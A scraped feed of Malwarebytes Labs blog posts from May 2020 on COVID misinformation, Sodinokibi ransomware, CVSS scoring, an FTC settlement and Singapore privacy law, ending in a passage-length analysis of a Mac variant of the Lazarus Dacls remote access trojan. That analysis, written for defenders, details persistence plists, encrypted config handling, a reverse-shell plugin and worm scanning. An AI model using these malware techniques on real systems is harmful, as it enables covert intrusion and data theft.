Subscribe to Malwarebytes feed
The Security Blog From Malwarebytes
Updated: 2 months 2 weeks ago

When the coronavirus infodemic strikes

Tue, 05/19/2020 - 15:15

Social media sites are stepping up their efforts in the war against misinformation… specifically, the coronavirus/COVID-19 infodemic. There’s a seemingly endless stream of potentially dangerous misinformation flying around online related to the COVID-19 pandemic, and that could have fatal results.

It’s boomtown in fake-news land riding high on the wave of people being left with their tech devices 24/7. I myself regularly see everything posted online from “hand gel is an immunizer” (nope) and “children can’t be affected” (not true) to “UK rules mean domestic abuse survivors have to stay with their abusive spouse” (absolutely not true at all and hugely dangerous to claim). 

We even have engineers being spat on thanks to 5G conspiracy theories potentially resulting in transmission of coronavirus. Turns out a global pandemic is a lightning rod for pushing people to conspiracy theories galore, to the extent that some folks have to go hunting for guides to wean their family members away from internet fake outs. There are serious consequences taking shape, via every source imaginable—no matter how baffling.

What is being done to tackle these tall tales online?

Youtube: We begin with the video monolith, removing multiple “Coronavirus is caused by 5G” videos (one of which had more than 1.5m views) after an investigation by PressGazette. Some of the other clips about Bill Gates, the media, and related subjects were from big number, verified accounts—often with adverts overlaid from advertisers who didn’t want their promotions associated with said content. While YouTube claims to have removed thousands of videos “since early February,” the video giant and many others are under intense pressure to take things up a notch or two.

While the top search results for “5G coronavirus” in YouTube currently bring back a variety of verified sources debunking the many conspiracy claims, filtering videos by what was posted “today” results in an assortment of freshly uploaded clips of people filming 5G towers and tagging them with “Coronavirus” in the titles. Should you see something specifically pushing a conspiracy theory, the report options are still quite generic:

  • Sexual content
  • Violent or repulsive content
  • Hateful or abusive content
  • Harmful or dangerous acts
  • Spam or misleading

While you’d likely select the last option, there’s still nothing specifically about the pandemic itself. This may be concerning, considering a recent study by BMJ Global Health found that one in four of the most popular videos about the pandemic contained misinformation. What that looks like is 62 million views across 19 dubious videos out of 69 popular videos from one single day. It’s quite concerning.

Twitter: This is an interesting one, as Twitter are looking to flag Tweets and/or accounts pushing bad information in relation to COVID-19. While this is a good move, it appears to be something done entirely at their end; if you try to flag a Tweet yourself as COVID-19 misinformation, there’s no option to do so in the reporting tab. “It’s suspicious or spam” and “It’s abusive or harmful” are the closest, but there’s nothing specific in the follow up options tied to either of those selections.

This feels a bit like a missed opportunity, though there will be reasons why this isn’t available as an option. Perhaps they anticipate false flag and troll reporting of valid data, though one would hope their internal processes for flagging bad content would be able to counteract this possibility.

Facebook: The social media giant came under fire in April for their approach to the misinformation crisis, with large view counts, bad content not flagged as false, and up to 22 days for warnings to be issued, leading one campaign director at a crowdfunded activist group to claim they were “at the epicentre of the misinformation crisis.”


Facebook decided to start notifying users who’d interacted with what can reliably be called “the bad stuff” to try and push back on content rife in groups and elsewhere. Facebook continues to address the problem with multiple initiatives including tackling bad ads, linking people to credible information, and combating rogue data across multiple apps. The sheer size of their user base suggests this fight is far from over, though.

TikTok: Thinking that conspiracy theories and misinformation wouldn’t pop up on viral music/clip sensation TikTok is probably a bad idea. In some cases it’s flourished on the platform away from serious researcher eyes still focused on the big social media platforms such as Twitter and Facebook.

While TikTok is somewhat unique with regards having COVID-19 misinformation as a specific reporting category, it’s not exactly been plain sailing. Popular hashtag categories seemingly have more than their fair share of bad content, tying bad data and poorly sourced claims to cool songs and snappy soundbites.

Internet Archive: Even the Internet Archive isn’t safe from coronavirus shenanigans as people use saved pages to continue spreading bad links online. Even if a bad site is taken down, flagged as harmful, or removed from search engines, the act of scooping it up and placing it on forevermore is a way for the people behind the sites to keep pushing those links. For their part, the Internet Archive is fighting  back with clear warning messages on some of the discredited content.

Beware a second Infodemic wave

Although some major online platforms were slow to respond to the bogus information wave, most of them now seem to at least have some sort of game plan in place. It’s debatable how much of it is working, but something is likely better than nothing and tactics continue to evolve in response to those hawking digital shenanigans.

However, it seems at least some warnings of the present so-called Infodemic were not heeded across many years and now we’re reaping the whirlwind. From Governments and healthcare organisations to the general public and online content sharing platforms, we’ve all been caught on the backfoot to various degrees. While the current genie is out of the bottle and won’t be going back in anytime soon, it’s up to all of us to think how we could do it better next time—because there will absolutely be a next time.

The post When the coronavirus infodemic strikes appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 11 – May 17)

Mon, 05/18/2020 - 15:28

Last week on Malwarebytes Labs, we explained why RevenueWire has to pay $6.7 million to settle FTC charges, how CVSS works: characterizing and scoring vulnerabilities, and we talked about how and why hackers hit a major law firm with Sodinokibi ransomware.

We also launched another episode of our podcast Lock and Code, this time speaking with Chris Boyd, lead malware intelligence analyst at Malwarebytes, about facial recognition technology—its early history, its proven failures at accuracy, and whether improving the technology would actually be “good” for society.

Other cybersecurity news
  • A new attack method was disclosed that targets devices with a Thunderbolt port, allowing an evil maid attack. (Source: SecurityWeek)
  • Almost four million users of MobiFriends, a popular Android dating app, have had their personal and log-in data stolen by hackers. (Source: IT Security Guru)
  • Cognizant estimates that the April ransomware attack that affected its internal network will cost the IT services firm between $50 and $70 million. (Source: GovInfoSecurity)
  • The database for the defunct hacker forum WeLeakData is being sold on the dark web and exposes the private conversations of hackers who used the site. (Source: BleepingComputer)
  • The U.S. government released information about three new malware strains used by state-sponsored North Korean hackers. (Source: The Hacker News)
  • Details were published about PrintDemon, a vulnerability in the Windows printing service that impacts all Windows versions going back to Windows NT 4. (Source: ZDNet)
  • US intel agencies expressed the need for a concerted campaign to patch for the top 10 most exploited vulnerabilities. (Source: CBR online)
  • Magellan Health, the Fortune 500 insurance company, has reported a ransomware attack and a data breach. (Source: ThreatPost)
  • Researchers found a new cyber-espionage framework called Ramsay, developed to collect and exfiltrate sensitive files from air-gapped networks. (Source: DarkReading)
  • The EFF called attention to the many ways in which the EARN IT Act would be a disaster for Internet users’ free speech and security. (Source: Electronic Frontier Foubndation)

Stay safe, everyone!

The post A week in security (May 11 – May 17) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Sodinokibi drops greatest hits collection, and crime is the secret ingredient

Thu, 05/14/2020 - 15:30

When a group of celebrities ask to speak with their lawyer, they usually don’t have to call in a bunch of other people to go speak with their lawyer. However, in this case it may well be a thing a little down the line. A huge array of musicians including Bruce Springsteen, Lady Gaga, Madonna, Run DMC and many more have had documents galore pilfered by the Sodinokibi gang.

Around 756GB of files including touring details, music rights, and correspondence were stolen – some of which was sitting pretty on a site accessible through TOR as proof of the sticky-fingered shenanigans. The law firm affected is Grubman Shire Meiselas & Sacks, a major player handling huge contacts for global megastars on a daily basis. Although they handle TV stars, actors, and sports personalities and more, so far the only data referenced online appears to be in relation to singers / songwriters. 


The assumption is the data is being displayed as a preview of things to come; pay a ransom, or the data gets it (and by gets it, we mean “everything is published online in disastrous fashion”). The Sodinobiki gang are not to be trifled with, having already brought the walls crashing down upon Travelex not so long ago.

Hot targets…

Legal firms are becoming a hot target for malware focused criminals as they realise the value of the data they’re sitting on. Break in, exfiltrate the files, then send a few ransom notes to show them you A) have the files and B) mean business. If they refuse to pay up, drop the files and walk away from the inevitable carnage of reputational damage + compromised clients.

Who or what is Sodinokibi?

Put simply, a devastatingly successful criminal group with a penchant for Ransomware, data theft, and extortion. Sporting a popular Ransomware as a Service business model, they spiked hard in May of 2019 with a ramp-up in attacks on business and (to some degree) consumers. Their ransomware went a long way to filling the void left by GandCrab group’s “retirement,” and multiple, smaller spikes took place until an eventual decline for both consumer and business towards the end of July.

There were six versions of Sodinokibi released into the wild between April to July alone, helping to keep the security industry and targets on their toes over a very condensed period. Vulnerabilities, phishing campaigns using malicious links, malvertising, and even compromised MSPs to help launch the ransomware waves. You should absolutely lock down your MSP, by the way.

Technical details on the attack?

This is a breaking story and for various reasons the affected parties aren’t going to spill the beans just yet, especially with investigations ongoing. Having said that, there’s every probability they used ransomware to get the job done and that this was a targeted attack. How is Sodinokibi ransomware faring at the moment?

Sodinokibi ransomware statistics

This likely isn’t part of any huge spam wave. Our monthly data for consumer and business shows the last big spike in Ransom.Sodinokibi back in December:

Overall detections for months in 2019 and 2020

Business detections hovered between 200 to 280 from September to November 2019, before exploding over December to just under 7,000. It quickly dropped back down to 260 in February 2020, with a slight spike of 1,447 in April.

Consumer, meanwhile, followed a slightly more convoluted path with a peak of just over 600 in November 2019, and numbers ranging from 293 in July 2019 to 228 in March 2020 and generally low numbers elsewhere (76 in August 2019, 70 in December 2019, and 109 in April 2020).

In conclusion, then, ensure your ransomware armory is fully stocked and ready to go should you be sitting on lots of incredibly valuable entertainer documents, or indeed anything at all. Whether hit by random attacks or targeted mayhem, the end result is still the same: lots of headaches, and quite a few calls to legal.

Or, in this case, many calls to legal.

The post Sodinokibi drops greatest hits collection, and crime is the secret ingredient appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How CVSS works: characterizing and scoring vulnerabilities

Wed, 05/13/2020 - 15:30

The Common Vulnerability Scoring System (CVSS) provides software developers, testers, and security and IT professionals with a standardized process for assessing vulnerabilities. You can use the CVSS to assess the threat level of each vulnerability, and then prioritize mitigation accordingly.

This article explains how the CVSS works, including a review of its components, and describes the importance of using a standardize process for assessing vulnerabilities.

What is a software vulnerability?

A software vulnerability is any weakness in the codebase that can be exploited. Vulnerabilities can result from a variety of coding mistakes, including faulty logic, inadequate validation mechanisms, or lack of protection against buffer overflows. Unprotected APIs and issues contributed by third-party libraries are also common sources of vulnerabilities.

Regardless of the source of the vulnerability, all present some risk to users and organizations. Until vulnerabilities are discovered and patched, or fixed in a software update, attackers can exploit them to damage systems, cause outages, steal data, or deploy and spread malware.

How vulnerabilities are reported

The way in which vulnerabilities are reported depends on the type of software they are discovered on and the type of vulnerability they appear to be. In addition, the perceived importance of the vulnerability to the finder is a factor in how it’s reported.

Typically, vulnerabilities are found and reported by security researchers, penetration testers, and users themselves. Security researchers and penetration testers may work full-time for organizations or they may function as freelancers working under a bug bounty program.

When vulnerabilities are minor or can be easily fixed by the user without vendor or community help, issues are more likely to go unreported. Likewise, if a severe issue is discovered by a black hat researcher, or cybercriminal, it may not be reported. Generally, however, vulnerabilities are reported to organizations or developers when found.

If a vulnerability is found in proprietary software, it may be reported directly to the vendor or to a third-party oversight organization, such as the non-profit security organization, MITRE. If one is found in open-source software, it may be reported to the community as a whole, to the project managers, or to an oversight group.

When vulnerabilities are reported to a group like MITRE, the organization assigns the issue an ID number and notifies the vendor or project manager. The responsible party then has 30 to 90 days to develop a fix or patch the issue before the information is made public. This reduces the chance that attackers can exploit the vulnerability before a solution is available.

What is CVSS?

The Common Vulnerability Scoring System (CVSS) is a set of free, open standards. These standards are maintained by the Forum of Incident Response and Security Teams (FIRST), a non-profit security organization. The standards use a scale of 0.0 to 10.0, with 10.0 representing the highest severity. The most recent version released is CVSS 3.1, released in June 2019.

These standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.

How CVSS scoring works

CVSS scoring is based on a combination of several subsets of scores. The only requirement for categorizing a vulnerability with a CVSS is the completion of the base score components. However, it is recommended that reporters also include temporal scores and environmental metrics for a more accurate evaluation.

The base score of the CVSS is assessed using an exploitability subscore, an impact subscore, and a scope subscore. These three contain metrics for assessing the scope of attacks, the importance of impacted data and systems, and the scope subscore assesses the impact of the attack on seemingly unaffected systems.

Base score

The base score is meant to represent the inherent qualities of a vulnerability. These qualities should not change over time nor should qualities be dependent on individual environments. To calculate the base score, reporters must calculate the composite of three subscores.

Exploitability subscore

The exploitability subscore measures the qualities of a vulnerable component. These qualities help researchers define how easily a vulnerability can be exploited by attackers. This subscore is composed of the following metrics:

Metric Measurement Scale (low to high) Attack vector (AV) How easy it is for attackers to access a vulnerability Physical (presence)
Local (presence)
Adjacent (connected networks)
Network (remote) Attack complexity (AC) What prerequisites are necessary for exploitation Low
High Privileges required (PR) The level of privileges needed to exploit the vulnerability None
High User interaction (UI) Whether exploitation requires actions from a tertiary user Binary—either None or Required

Impact subscore

The impact subscore measures the effects that successful exploitation has on the vulnerable component. It defines how a component is affected based on the change from pre to post exploit. This subscore is composed of the following metrics:

Metric Measurement Scale Confidentiality (C) Loss of data confidentiality in the component or wider systems None
High Integrity (I) Loss of data integrity throughout the component system None
High Availability (A) Loss of availability of the component or attached systems None

Scope subscore

The scope score measures what impact a vulnerability may have on components other than the one affected by the vulnerability. It tries to account for the overall system damage that an attacker can execute by exploiting the reported vulnerability. This is a binary scoring with scope being changed or unchanged.

Temporal score

The temporal score measures aspects of the vulnerability according to its current status as a known vulnerability. This score includes the following metrics:

Metric Measurement Scale (from low to high) Exploit code maturity (E) The availability of tools or code that can be used to exploit the vulnerability Proof of concept
Not defined Remediation level (RL) The level of remediation currently available to users Official fix
Temporary fix
Not defined Report confidence (RC) The degree of accuracy of the vulnerability report Unknown
Not defined Environmental metrics

Environmental metrics measure the severity of the vulnerability adjusted for its impact on individual systems. These metrics are customizations of the metrics used to calculate the base score. Environmental metrics are most useful when applied internally by security teams calculating severity in relation to their own systems.

The importance of standardization

CVSS provides comprehensive guidelines for assessing vulnerabilities. This scoring system is used by many and has a wide range of applications. However, perhaps the most important aspect of the CVSS is that it provides a unified standard for all relevant parties. Standardization is crucial when responding to risks and prioritizing mitigation.

CVSS scores are more than just a means of standardization. These scores have practical applications and can have a significant impact in helping security teams and product developers prioritize their efforts. 

Within an organization, security teams can use CVSS scores to efficiently allocate limited resources. These resources may include monitoring capabilities, time devoted to patching, or even threat hunting to determine if a vulnerability has already been exploited. This is particularly valuable for small teams who may not have the resources necessary to address every vulnerability.

CVSS scores can also be useful for security researchers. These scores can help highlight components that are especially vulnerable or tactics and tools that are particularly effective. Researchers can then apply this knowledge to developing new security practices and tools to help detect and eliminate threats from the start. 

Finally, CVSS scores can be informative for developers and testers in preventing vulnerabilities in the first place. Careful analysis of high ranking vulnerabilities can help software development teams prioritize testing. It can also help highlight areas where code security best practices can be improved. Rather than waiting until their own product is discovered to be vulnerable, teams can learn from other’s mistakes

The post How CVSS works: characterizing and scoring vulnerabilities appeared first on Malwarebytes Labs.

Categories: Techie Feeds

RevenueWire to pay $6.7 million to settle FTC charges

Tue, 05/12/2020 - 15:30

What can you do as a scammer when no legitimate payment provider wants to process your payments anymore? Or, what if you are growing sick and tired of these same payment providers reimbursing disgruntled customers who claim that your products didn’t fix computers, like—you know—you said they would?

Simple. You rely on some novel help. That is, until you get caught.

Let us tell you a story of intrigue and wrongdoing that resulted in a multi-million-dollar settlement issued by the US Federal Trade Commission.

How do tech support scammers work?

Some of the worst internet criminals are those who prey on the weakest groups in our society. Communities that are uncomfortable and less experienced with computers are already at a disadvantage, and tech support scammers make shameless use of these circumstances, demanding payments for bogus solutions to entirely non-existent tech problems. First comes the hook: There is something wrong with your computer. Then comes the sell: Only we can fix it.

But, that money stream can dry up because of a legitimate link in the chain—payment processors. Scammers may first receive services from legitimate payment processors, but soon, those providers will notice a high volume of complaints and wizen up to the actions of their customer, consequently kicking them out and warning their colleagues to stay away from said customer.

It’s a real problem for many tech support scammers, and one that has pushed some into even accepting gift cards as payment, just to circumvent the problem that they were refused by practically every payment provider.

But for a small group of call centers and software makers recently investigated by the FTC, there was a better option than gift cards.

Enter RevenueWire Inc., a Canadian company doing business as “SafeCart.”

Solution: start your own payment provider

The setup was clever.

First, RevenueWire entered into contracts with banks and payment processors in the US in order to obtain and open merchant accounts, thus allowing it to accept debit and credit payments. RevenueWire then entered into contracts with tech support call centers with a less-than-stellar track record. Further, according to the FTC, RevenueWire worked with separate, third-party software companies, including PC Cleaner Inc. and Boost Software Inc., which would direct consumers of their own software to any tech support call centers that were now working with RevenueWire.

In essence, RevenueWire engaged in a miniature, controlled economy, gaining vast insight into an entire ecosystem that included making software, selling it, providing tech support services, and funneling payments made along the way.

This made for a complete alignment of businesses. According to the FTC, the stakeholders in this organization closely cooperated with and participated in companies that acted as telemarketers, software builders, website designers, and call center operators. Plus, they now had their own payment provider.

What they did

The organization’s objective, according to the FTC, was to swindle customers out of their money while pretending to be tech support operators.

When you are a tech support scammer there are three main angles you can work to get your “clients” to call you. Calling the clients and trying to sell them your services is one method, and they didn’t shy away it. But as you can imagine, the chances of deceiving a client are much higher when you get a client to actually call you. To achieve this, tech support scammers can:

  • Pretend to represent a legitimate company, where Microsoft and Apple are probably the most well-known examples. But Malwarebytes has been the victim of impersonation a few times as well.
  • Use advertising to get prospects to visit websites with the number you want them to call, to the degree of using browser lockers and fake online scanners to convince the visitor their computer has serious issues, that only you know how to solve—at a steep price.
  • Release fake anti-malware software that prominently displays your number as a help resource. Again, convincing the user that he needs to buy the software to fix those problems, and probably some extra services to go.

In the case at hand, the tech support call centers working with RevenueWire were run by Vast Tech Support, LLC (“Vast”) and Inbound Call Experts, LLC (“ICE”). The FTC filed legal actions against both these companies in the past.

What charges did RevenueWire receive?

RevenueWire was charged under the accusation that they laundered credit card payments for, and assisted and facilitated, two tech support scams previously sued by the FTC. You guessed it, those two tech support scammers were Vast and ICE.

As Andrew Smith, director of the FTC’s Bureau of Consumer Protection, said in a news release when the settlement was announced:

“Finding ways to get paid – without getting caught – is essential for scammers who steal money from consumers. And that’s exactly what RevenueWire did for tech support scammers when it laundered their transactions through the credit card system.”

The FTC said that RevenueWire violated the Federal Trade Commission Act, which prohibits “unfair or deceptive acts or practices in or affection commerce.” RevenueWire also, according to the FTC, violated the the Telemarketing Sales Rule, “provided substantial assistance and support to one or more sellers or telemarketers, whom they knew, or consciously avoided knowing, were violating” sections of the Telemarketing Sales Rule, and they “submitted charges through RevenueWire’s merchant account for companies that made false statements to consumers.”

What about the people that worked for RevenueWire?

Only a few people that worked at RevenueWire knew about the complete business model. Most of the employees never learned—and may have been shocked to learn—about the company’s true nature when it was named in the FTC settlement. Some may have figured out what was going on while they were working for RevenueWire, but almost no-one was told up front. A fraud analyst working for RevenueWire repeatedly warned executives about dealings with “crooks,” according to evidence published in the FTC’s report. This information was directly shared with Roberta Leach, RevenueWire’s CEO and a named defendant in the FTC case.

The good news

In a recent press release, the FTC announced that RevenueWire and its CEO, Roberta Leach will pay $6.75 million to settle charges that they laundered credit card payments for, and assisted and facilitated, two tech support scams previously shut down by the FTC.

The FTC stipulated:

“Consumers throughout the country have been injured by tech support scams in which fraudsters deceptively market services to ‘fix’ purported problems on consumers’ computers. The FTC and state law enforcers have brought cases against the software sellers and call centers involved in these scams, including call centers operated by Vast Tech Support, LLC (‘Vast’) and Inbound Call Experts, LLC (‘ICE’). FTC v. Boost Software, Inc., No. 14-81397 (S.D. Fla. filed Nov. 10, 2014); FTC v. Inbound Call Experts, LLC, No. 14-81395 (S.D. Fla. filed Nov. 10, 2014). RevenueWire, Inc. and its Chief Executive Officer (collectively, ‘Defendants’) have played a key role in many of these scams, including the Vast and ICE scams. Using a business model named ‘Call Stream,’ the Defendants have provided lead generation, business development, payment processing, and money distribution services to numerous tech support fraudsters, leading to hundreds of millions of dollars of consumer injury.”

We are pleased to learn that the FTC successfully went after this enabler and payment provider, especially in this case as they knew what they were doing and the FTC could build on the cases where they ruled against the scammers themselves.

Malwarebytes’ fight against tech support scammers

Malwarebytes has been involved in the fight against tech support scammers ever since the beginning of our company, even though it is not something that results in a profit for us. We feel that tech support scammers give the industry a bad name by proxy and as pointed out earlier, some of them even pretend to represent our company. Also, we care about everyone’s safety, not just the safety of our paying customers.

If you want to be sure to get help from our actual support team, don’t contact just any number you find while searching, but reach out to us through our Support portal.

Stay safe, everyone, and remain vigilant!

The post RevenueWire to pay $6.7 million to settle FTC charges appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Lock and Code S1Ep6: Recognizing facial recognition’s flaws with Chris Boyd

Mon, 05/11/2020 - 15:15

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Chris Boyd, lead malware intelligence analyst at Malwarebytes, about facial recognition technology—its early history, its proven failures at accuracy, and whether improving the technology would actually be “good” for society.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on: Plus other cybersecurity news:

Stay safe, everyone!

The post Lock and Code S1Ep6: Recognizing facial recognition’s flaws with Chris Boyd appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Data privacy law updates eyed by Singapore

Thu, 05/07/2020 - 15:15

In early 2019, Singapore’s data privacy regulators proposed that the country’s data privacy law could use two new updates—a data breach notification requirement and a right of data portability for the country’s residents.

The proposed additions are commonplace in several data privacy laws around the world, including, most notably, the European Union General Data Protection Regulation, or GDPR, a sweeping set of data protections that came into effect two years ago.

If Singapore approves its two updates, it would be the latest country in a long line of other countries to align their own data privacy laws with GDPR.

The appeal is clear: Countries that closely hew their own data privacy laws to GDPR have a better shot at obtaining what is called an “adequacy determination” from the European Commission, meaning those countries can legally transfer data between themselves and the EU.

Such a data transfer regime is key to engaging in today’s economy, said D. Reed Freeman Jr., cybersecurity and privacy practice co-chair at the Washington, D.C.-based law firm Wilmer Cutler Pickering Hale and Dorr. If anything, the proposed appeal to GDPR is as much an economic decision as it is one of data privacy rights.

“The world’s economy depends on data flows, and the more restrictive the data flows are, the better,” Freeman said. “Multinational [organizations] in Singapore would like to have an adequacy determination.”

Singapore’s Personal Data Protection Act

On October 15, 2012, Singapore passed its data protection law, the Personal Data Protection Act (PDPA), putting into place new rules for the collection, use, and disclosure of personal data. The PDPA did two other things. It created a national “Do Not Call” register and it established the country’s primary data protection authority, the Personal Data Protection Commission.

For years, the Personal Data Protection Commission has issued warnings to organizations that violate the country’s data protection law, publishing their decisions for the public to read. It is the same commission responsible for the current attempts to update the law.

Today, Singaporeans enjoy some of the same data protection rights found in the European Union and even in California.

For starters, Singaporeans have the right to request that an organization hand over any personal data that belongs to them. Further, Singaporeans also have the right to correct that personal data should they find any errors or omissions.

Singapore’s data privacy law also includes restrictions for how organizations collect, use, or disclose the personal data of Singaporeans.

According to the PDPA, organizations must obtain “consent” before collecting, using, or disclosing personal data (more on that below). Organizations must also abide by “purpose” limitations, meaning that they can “collect, use or disclose personal data about an individual only for purposes that a reasonable person would consider appropriate in the circumstances and, if applicable, have been notified to the individual concerned.” Organizations must notify individuals about planned collection, use, and disclosure of personal data, and collected personal data must be accurate.

Further, any personal data in an organization’s possession must be protected through the implementation of “reasonable security arrangements to prevent unauthorized access, collection, use, disclosure, copying, modification, disposal or similar risks.” And organizations also have to “cease to retain” documents that contain personal data, or “remove the means by which the personal data can be associated with particular individuals” after the purpose for collecting personal data ends.

While these rules sound similar to GDPR, there are discrepancies—including how Singapore and the EU approach “consent.” In Singapore’s PDPA, consent is not required to collect personal data when that data is publicly available, is necessary for broadly defined “evaluative purposes,” or collected solely for “artistic or literary purposes.” In the EU, there are no similar exceptions.

Two other areas where the laws differ are, of course, data portability and data breach notification requirements. Singapore’s law has none.

Proposed data privacy additions

On February 25, 2019, Singapore’s Personal Data Protection Commission published a “discussion paper” on data portability, explaining the benefits of adding a data portability requirement to the PDPA.

“Data portability, whereby users are empowered to authorize the movement of their personal data across organizations, can boost data flows and support greater data sharing in a digital economy both within and across sectors,” the PDPC said in a press release.

With a right data portability, individuals can request that organizations hand over their personal data in a format that lets them easily move it to another provider and basically plug it in for immediate use. Think of it like taking your email contacts from one email provider to another, but on a much larger scale and with potentially less value—it’s not like your Facebook status updates from 2008 will do you much good on Twitter today.

Less than one week after publishing its data portability discussion paper, the Personal Data Protection Commission also announced plans to add a data breach notification requirement to the PDPA.

The Personal Data Protection Commission proposed that if organizations suffered a data breach that potentially harmed individuals, those individuals and the PDPC itself would need to be notified. Further, even if a data breach brought no potential harm to individuals, organizations would need to notify the PDPC if more than 500 people’s personal data was affected.

Following public consultations, the data portability requirement was well-received.

Why attempt data privacy updates now?

Aligning a country’s data protection laws with the protections provided in GDPR is nothing new, and in fact, multiple countries around the world are currently engaged in the same process. But Singapore’s timing could potentially be further pinned down to another GDPR development in early January of 2019—an adequacy determination granted by the European Commission to another country, Japan.

Wilmer Hale’s Freeman said it is likely that Singapore looked to Japan and wanted the same.

“[Singapore] is competing in the Asia market and in the global market, and I would suspect that the leaders in Singapore saw what happened in Japan, asked the relevant people at the Commission, ‘What do we need to do to get that?’ and were told ‘If you line up [PDPA] pretty close, we have a good chance of getting an adequacy determination.’” Freeman said.

Freeman explained that, in recent history, obtaining an adequacy determination relies on whether a country’s data protection laws are similar to GDPR.

“Over time, it’s been sort of short-hand thought of as ‘adequacy’ means something close to ‘equivalent,’” Freeman said.

As to the importance, Freeman explained that any multinational business that wants to move data between its home country and the EU must, per the rules of GDPR, obtain an adequacy determination. No determination, no legal opportunity to engage in the world’s economy.

“If you’re a multinational company and you have employees and customers in Europe, and you want to store the data at the home office in Singapore, you need a lawful basis to do that,” Freeman said. An adequacy determination is that legal basis, Freeman said, and it’s far more difficult to “undo” an adequacy determination than it is a bilateral agreement, like the one struck down by the Court of Justice for the European Union between the EU and the United States.

Don’t reinvent the data privacy wheel

Singapore has not proposed a time frame for when it wants to finalize the data portability rights and data breach notification requirements. Nor has it specified the actual regulations it would put in place—including how long before the Personal Data Protection Commission would enforce the new requirements, or what those enforcement actions would entail.

Freeman suggested that when the Singaporean government clarifies its proposals, it look to its neighbors across the world who have grappled with the same questions on data breach notifications and data portability.

For data portability, Freeman explained that many large corporations have already struggled to comply with the rules both in GDPR and in the California Consumer Privacy Act, not because of an inability to do so, but because providing such in-depth data access to individuals requires understanding all the places where an individual’s personal data can live.

“Is it stored locally? On servers in different places? Is it in email? In instant messaging? On posts?” Freeman said.

For data breach notification requirements, Freeman also said that it makes little sense to create something “out of whole cloth” that will create new burdens on multinational businesses that already have to comply with the data breach notification requirements in GDPR and in the 50 US states.

It’s better to find what currently works, Freeman said, and borrow.

The post Data privacy law updates eyed by Singapore appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app

Wed, 05/06/2020 - 15:59

This blog post was authored by Hossein Jazi, Thomas Reed and Jérôme Segura.

We recently identified what we believe is a new variant of the Dacls Remote Access Trojan (RAT) associated with North Korea’s Lazarus group, designed specifically for the Mac operating system.

Dacls is a RAT that was discovered by Qihoo 360 NetLab in December 2019 as a fully functional covert remote access Trojan targeting the Windows and Linux platforms.

This Mac version is at least distributed via a Trojanized two-factor authentication application for macOS called MinaOTP, mostly used by Chinese speakers. Similar to the Linux variant, it boasts a variety of features including command execution, file management, traffic proxying and worm scanning.


On April 8th, a suspicious Mac application named “TinkaOTP” was submitted to VirusTotal from Hong Kong. It was not detected by any engines at the time.

The malicious bot executable is located in “Contents/Resources/Base.lproj/” directory of the application and pretends to be a nib file (“SubMenu.nib”) while it’s a Mac executable file. It contained the strings “c_2910.cls” and “k_3872.cls” which are the names of certificate and private key files that had been previously observed.


This RAT persists through LaunchDaemons or LaunchAgents which take a property list (plist) file that specifies the application that needs to be executed after reboot. The difference between LaunchAgents and LaunchDaemons is that LaunchAgents run code on behalf of the logged-in user while LaunchDaemon run code as root user.

When the malicious application starts, it creates a plist file with the “com.aex-loop.agent.plist” name under the “Library/LaunchDaemons” directory. The content of the plist file is hardcoded within the application.

 The program also checks if “getpwuid( getuid())” returns the user id of the current process. If a user id is returned, it creates the plist file “com.aex-loop.agent.plist” under the LaunchAgents directory: “Library/LaunchAgents/”.

Figure 1: Plist file

The file name and directory to store the plist are in hex format and appended together. They show the filename and directory backwards.

Figure 2: Directory and file name generation Config File

The config file contains the information about the victim’s machine such as Puid, Pwuid, plugins and C&C servers. The contents of the config file are encrypted using the AES encryption algorithm.

Figure 3: Load config

 Both Mac and Linux variants use the same AES key and IV to encrypt and decrypt the config file. The AES mode in both variants is CBC.

Figure 4: AES Key and IV

The config file location and name are stored in hex format within the code. The name of the config file pretends to be a database file related to the Apple Store:


Figure 5: Config file name

The “IntializeConfiguration” function initializes the config file with the following hardcoded C&C servers.

Figure 6: Initialize config file

The config file is constantly updated by receiving commands from the C&C server. The application name after installation is “mina”. Mina comes from the MinaOTP application which is a two-factor authentication app for macOS.

Figure 7: Config file is being updated Main Loop

After initializing the config file, the main loop is executed to perform the following four main commands:

  • Upload C&C server information from the config file to the server (0x601)
  • Download the config file contents from the server and update the config file (0x602)
  • Upload collected information from the victim’s machine by calling “getbasicinfo” function (0x700)
  • Send heartbeat information (0x900)

The command codes are exactly the same as Linux.dacls.

Figure 8: Main Loop Plugins

This Mac RAT has all the six plugins seen in the Linux variant with an additional plugin named “SOCKS”. This new plugin is used to proxy network traffic from the victim to the C&C server.

The app loads all the seven plugins at the start of the main loop. Each plugin has its own configuration section in the config file which will be loaded at the initialization of the plugin.

Figure 9: Plugins loaded CMD plugin

The cmd plugin is similar to the “bash” plugin in the Linux rat which receives and executes commands by providing a reverse shell to the C&C server.

Figure 10: Cmd Plugin File Plugin

The file plugin has the capability to read, delete, download, and search files within a directory. The only difference between the Mac and Linux version is that the Mac version does not have the capability to write files (Case 0).

Figure 11: File plugin Process plugin

The process plugin has the capability of killing, running, getting process ID and collecting process information.

Figure 12: Process Plugin

If the “/proc/%d/task” directory of a process is accessible, the plugin obtains the following information from the process where %d is the process ID:

  • Command line arguments of the process by executing “/proc/ %/cmdline”
  • Name, Uid, Gid, PPid of the process from the “/proc/%d/status” file.
Test plugin

The code for the Test plugin between Mac and Linux variant is the same. It checks the connection to an IP and Port specified by the C&C servers.

RP2P plugin

The RP2P plugin is a proxy server used to avoid direct communications from the victim to the actor’s infrastructure.

Figure 13: Reverse P2P LogSend plugin

The Logsend plugin contains three modules that:

  • Check connection to the Log server
  • Scan network (worm scanner module)
  • Execute long run system commands
Figure 14: Logsend Plugin

This plugin sends the collected logs using HTTP post requests.

Figure 15: User Agent

An interesting function in this plugin is the worm scanner. The “start_worm_scan” can scan a network subnet on ports 8291 or 8292. The subnet that gets scanned is determined based on a set of predefined rules. The following diagram shows the process of selecting the subnet to scan.

Figure 16: Worm Scan Socks plugin

